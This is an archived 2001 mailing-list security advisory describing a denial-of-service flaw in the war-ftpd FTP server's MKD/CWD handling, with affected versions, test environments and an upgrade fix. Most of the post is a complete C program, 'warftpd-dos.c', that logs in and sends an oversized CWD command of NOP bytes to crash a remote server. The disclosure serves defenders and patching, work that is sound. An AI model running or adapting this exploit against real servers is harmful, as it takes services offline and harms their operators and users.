Hello, "war-ftpd" is very popular ftp server for Windows95/98/NT. I found DoS problem to "war-ftpd 1.6x" recently. Outline: It seems to occur because the bound check of the command of MKD/CWD that uses it is imperfect when this problem controls the directory. However, could not hijack the control of EIP so as long as I test. It is because not able to overwrite the RET address, because it seems to be checking buffer total capacity properly in 1.66x4 and later. The boundary of Access Violation breaks out among 8182 bytes from 533 bytes neighborhood although it differs by the thread that receives attack. The version that is confirming this vulnerable point is as follows. 1.66x4s, 1.67-3 The version that this vulnerable point was not found is as follows. 1.71-0 Test Environments: Microsoft WindowsNT 4.0 Workstation SP6a Japanese version+IE4.0SP2 Microsoft WindowsNT 4.0 Workstation SP5 Japanese version+IE4.0SP2 Microsoft WindowsNT 4.0 Server SP4 Japanese version Solution: 1.70-1 should be used to solve this problem fundamentally. Because it becomes "Access denied" in 1.71-0 DoS did not break out. --- warftpd-dos.c I coded program for the reappearance of this problem. The contents apply DoS attack for "war-ftpd" to the server who is working from the remote. /*--------------------------------------------------------------*/ /* war-ftpd 1.66x4s and 1.67-3 DoS sample by crc "warftpd-dos.c"*/ /*--------------------------------------------------------------*/ #include <stdio.h> #include <string.h> #include <winsock.h> #include <windows.h> #define FTP_PORT 21 #define MAXBUF 8182 //#define MAXBUF 553 #define MAXPACKETBUF 32000 #define NOP 0x90 void main(int argc,char *argv[]) { SOCKET sock; unsigned long victimaddr; SOCKADDR_IN victimsockaddr; WORD wVersionRequested; int nErrorStatus; static unsigned char buf[MAXBUF],packetbuf[MAXPACKETBUF],*q; hostent *victimhostent; WSADATA wsa; if (argc < 3){ printf("Usage: %s TargetHost UserName Password\n",argv[0]); exit(1); } wVersionRequested = MAKEWORD(1, 1); nErrorStatus = WSAStartup(wVersionRequested, &wsa); if (atexit((void (*)(void))(WSACleanup))) { fprintf(stderr,"atexit(WSACleanup)failed\n"); exit(-1); } if ( nErrorStatus != 0 ) { fprintf(stderr,"Winsock Initialization failed\n"); exit(-1); } if ((sock=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET){ fprintf(stderr,"Can't create socket.\n"); exit(-1); } victimaddr = inet_addr((char*)argv[1]); if (victimaddr == -1) { victimhostent = gethostbyname(argv[1]); if (victimhostent == NULL) { fprintf(stderr,"Can't resolve specified host.\n"); exit(-1); } else victimaddr = *((unsigned long *)((victimhostent->h_addr_list)[0])); } victimsockaddr.sin_family = AF_INET; victimsockaddr.sin_addr.s_addr = victimaddr; victimsockaddr.sin_port = htons((unsigned short)FTP_PORT); memset(victimsockaddr.sin_zero,(int)0,sizeof(victimsockaddr.sin_zero)); if(connect(sock,(struct sockaddr *)&victimsockaddr,sizeof(victimsockaddr)) == SOCKET_ERROR){ fprintf(stderr,"Connection refused.\n"); exit(-1); } printf("Attacking war-ftpd ...\n"); recv(sock,(char *)packetbuf,MAXPACKETBUF,0); sprintf((char *)packetbuf,"USER %s\r\n",argv[2]); send(sock,(char *)packetbuf,strlen((char *)packetbuf),0); recv(sock,(char *)packetbuf,MAXPACKETBUF,0); sprintf((char *)packetbuf,"PASS %s\r\n",argv[3]); send(sock,(char *)packetbuf,strlen((char *)packetbuf),0); recv(sock,(char *)packetbuf,MAXPACKETBUF,0); memset(buf,NOP,MAXBUF); buf[MAXBUF-1]=0; sprintf((char *)packetbuf,"CWD %s\r\n",buf); send(sock,(char *)packetbuf,strlen((char *)packetbuf),0); Sleep(100); shutdown(sock, 2); closesocket(sock); WSACleanup(); printf("done.\n"); } ---- Toshimi Makino E-mail:crcat_private
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:32:57 PDT